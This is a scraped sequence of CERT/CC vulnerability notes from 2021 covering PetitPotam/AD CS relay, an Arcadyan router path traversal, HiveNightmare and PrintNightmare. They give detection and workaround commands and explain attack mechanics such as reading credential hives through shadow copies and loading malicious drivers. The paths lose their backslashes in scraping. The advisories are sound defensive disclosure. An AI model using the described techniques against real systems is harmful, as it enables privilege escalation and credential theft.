The CERT/CC is currently unaware of a practical solution to this problem. Please see KB5005413 for several workarounds.
Please see KB5005413 for more details about enabling EPA to help protect against this weakness. It is important to note:
web.config
file to successfully enable EPA.Instructions for disabling NTLM authentication in your domain can be found in the article Network security: Restrict NTLM: NTLM authentication in this domain.
The stage of leveraging an AD CS server to achieve the ability to get a TGT can be mitigated by disabling incoming NTLM support on AD CS servers. To configure this GPO setting, go to: Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options and set Network security: Restrict NTLM: Incoming NTLM traffic to Deny All Accounts or Deny All domain accounts
For both the "Certificate Authority Web Enrollment" (CES) service (<CA_INFO>-CA_CES_Kerberos
in IIS Manager) and the "Certificate Enrollment Web Service" (CertSrv
in IIS Manager) services:
*-CA_CES_Kerberos
and CertSrv
Windows Authentication
Providers...
link on the right sideNTLM
Remove
Buttoniisreset /restart
The PetitPotam aspect of this attack chain was publicly disclosed by topotam. The AD CS aspect was publicly disclosed by harmj0y and tifkin_.
This document was written by Will Dormann.
CVE IDs: | |
Date Public: | 2021-08-02 |
Date First Published: | 2021-08-02 |
Date Last Updated: | 2021-08-02 22:24 UTC |
Document Revision: | 4 |
A path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.
The vulnerability, identified as CVE-2021-20090, is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their findings, but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.
Successful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.
The CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN.
Thanks to the reporter Evan Grant from Tenable.
This document was written by Timur Snoke.
CVE IDs: | CVE-2021-20090 |
Date Public: | 2021-07-20 |
Date First Published: | 2021-07-20 |
Date Last Updated: | 2021-07-20 20:21 UTC |
Document Revision: | 1 |
Starting with Windows 10 build 1809, non-administrative users are granted access to SAM, SYSTEM, and SECURITY registry hive files. This can allow for local privilege escalation (LPE).
Starting with Windows 10 build 1809, the BUILTINUsers
group is given RX
permissions to the following files:
c:WindowsSystem32configsam
c:WindowsSystem32configsystem
c:WindowsSystem32configsecurity
If a VSS shadow copy of the system drive is available, a non-privileged user may leverage access to these files to achieve a number of impacts, including but not limited to:
Note that VSS shadow copies may not be available in some configurations, however simply having a system drive that is larger that 128GB in size and then performing a Windows Update or installing an MSI will ensure that a VSS shadow copy will be automatically created. To check if a system has VSS shadow copies available, run the following command from a privileged command prompt:
vssadmin list shadows
A system with VSS shadow copies will report details of at least one shadow copy that specifies Original Volume: (C:)
, such as the following:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Contents of shadow copy set ID: {d9e0503a-bafa-4255-bfc5-b781cb27737e}
Contained 1 shadow copies at creation time: 7/19/2021 10:29:49 PM
Shadow Copy ID: {b7f4115b-4242-4e13-84c0-869524965718}
Original Volume: (C:)\?Volume{4c1bc45e-359f-4517-88e4-e985330f72e9}
Shadow Copy Volume: \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1
Originating Machine: DESKTOP-PAPIHMA
Service Machine: DESKTOP-PAPIHMA
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessibleWriters
Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered
A system without VSS shadow copies will produce output like the following:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
No items found that satisfy the query.
To check if a system is vulnerable, the following command can be used from a non-privileged account:
icacls %windir%system32configsam
A vulnerable system will report BUILTINUsers:(I)(RX)
in the output like this:
C:Windowssystem32configsam BUILTINAdministrators:(I)(F)
NT AUTHORITYSYSTEM:(I)(F)
BUILTINUsers:(I)(RX)
APPLICATION PACKAGE AUTHORITYALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITYALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
A system that is not vulnerable will report output like this:
C:Windowssystem32configsam: Access is denied.
Successfully processed 0 files; Failed processing 1 files
By accessing a Windows 10 system's sam
, system
, and security
files on a vulnerable system with at least one VSS shadow copy of the system drive, a local authenticated attacker may be able to achieve LPE, masquerade as other users, or achieve other security-related impacts.
The CERT/CC is currently unaware of a practical solution to this problem. Please consider the following workaround:
Vulnerable systems can remove the Users
ACL to read these sensitive files by executing the following commands:
icacls %windir%system32configsam /remove "Users"
icacls %windir%system32configsecurity /remove "Users"
icacls %windir%system32configsystem /remove "Users"
Once the ACLs have been corrected for these files, any VSS shadow copies of the system drive must be deleted to protect a system against exploitation. This can be accomplished with the following command, assuming that your system drive is c:
:
vssadmin delete shadows /for=c: /Quiet
Confirm that VSS shadow copies were deleted by running vssadmin list shadows
again. Note that any capabilities relying on existing shadow copies, such as System Restore, will not function as expected. Newly-created shadow copies, which will contain the proper ACLs, will function as expected.
This vulnerability was publicly disclosed by Jonas Lyk, with additional details provided by Benjamin Delpy.
This document was written by Will Dormann.
CVE IDs: | |
Date Public: | 2021-07-20 |
Date First Published: | 2021-07-20 |
Date Last Updated: | 2021-07-20 19:32 UTC |
Document Revision: | 3 |
Microsoft Windows allows for non-admin users to be able to install printer drivers via Point and Print. Printers installed via this technique also install queue-specific files, which can be arbitrary libraries to be loaded by the privileged Windows Print Spooler process.
Microsoft Windows allows for users who lack administrative privileges to still be able to install printer drivers, which execute with SYSTEM
privileges via the Print Spooler service. This ability is achieved through a capability called Point and Print. Starting with the update for MS16-087, Microsoft requires that printers installable via Point are either signed by a WHQL release signature, or are signed by a certificate that is explicitly trusted by the target system, such as an installed test signing certificate. The intention for this change is to avoid installation of malicious printer drivers, which can allow for Local Privilege Escalation (LPE) to SYSTEM
.
While Windows enforces that driver packages themselves are signed by a trusted source, Windows printer drivers can specify queue-specific files that are associated with the use of the device. For example, a shared printer can specify a CopyFiles
directive for arbitrary ICM files. These files, which are copied over with the digital-signature-enforced printer driver files are not covered by any signature requirement. That is, any file can be copied to a client system via Point and Print printer driver installation, where it can be used by another printer with SYSTEM
privileges. This allows for LPE on a vulnerable system.
An exploit for this vulnerability is publicly available.
By connecting to a malicious printer, an attacker may be able to execute arbitrary code with SYSTEM
privileges on a vulnerable system.
The CERT/CC is currently unaware of a practical solution to this problem. Please consider the following workarounds:
Public exploits for this vulnerability utilize SMB for connectivity to a malicious shared printer. If outbound connections to SMB resources are blocked, then this vulnerability may be mitigated for malicious SMB printers that are hosted outside of your network. Note that Microsoft indicates that printers can be shared via the [MS-WPRN] Web Point-and-Print Protocol, which may allow installation of arbitrary printer drivers without relying on SMB traffic. Also, an attacker local to your network would be able to share a printer via SMB, which would be unaffected by any outbound SMB traffic rules.
Microsoft Windows has a Group Policy called "Package Point and Print - Approved servers", which is reflected in the HKLMSoftwarePoliciesMicrosoftWindows NTPrintersPackagePointAndPrintPackagePointAndPrintServerList
and HKLMSoftwarePoliciesMicrosoftWindows NTPrintersPackagePointAndPrintListofServers
registry values. This policy can restrict which servers can be used by non-administrative users to install printers via Point and Print. Configure this policy to prevent installation of printers from arbitrary servers.
This vulnerability was publicly disclosed by Benjamin Delpy.
This document was written by Will Dormann.
CVE IDs: | |
Date Public: | 2021-07-18 |
Date First Published: | 2021-07-18 |
Date Last Updated: | 2021-07-18 12:38 UTC |
Document Revision: | 1 |
The Microsoft Windows Print Spooler service fails to restrict access to the RpcAddPrinterDriverEx() function, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.
The RpcAddPrinterDriverEx()
function is used to install a printer driver on a system. One of the parameters to this function is the DRIVER_CONTAINER object, which contains information about which driver is to be used by the added printer. The other argument, dwFileCopyFlags
, specifies how replacement printer driver files are to be copied. An attacker can take advantage of the fact that any authenticated user can call RpcAddPrinterDriverEx()
and specify a driver file that lives on a remote server. This results in the Print Spooler service spoolsv.exe
executing code in an arbitrary DLL file with SYSTEM privileges.
While Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does NOT address the public exploits that also identify as CVE-2021-1675.
Exploit code for this vulnerability that targets Active Directory domain controllers is publicly available as PrintNightmare
.
By sending an RpcAddPrinterDriverEx()
RPC request, e.g. over SMB, a remote, authenticated attacker may be able to execute arbitrary code with SYSTEM privileges on a vulnerable system.
The CERT/CC is currently unaware of a practical solution to this problem. Please consider the following workaround:
This vulnerability can be mitigated by stopping and disabling the Print Spooler service in Windows.
This issue was publicly disclosed by Zhiniang Peng and Xuefeng Li.
This document was written by Will Dormann.
CVE IDs: | |
Date Public: | 2021-06-30 |
Date First Published: | 2021-06-30 |
Date Last Updated: | 2021-06-30 20:37 UTC |
Document Revision: | 2 |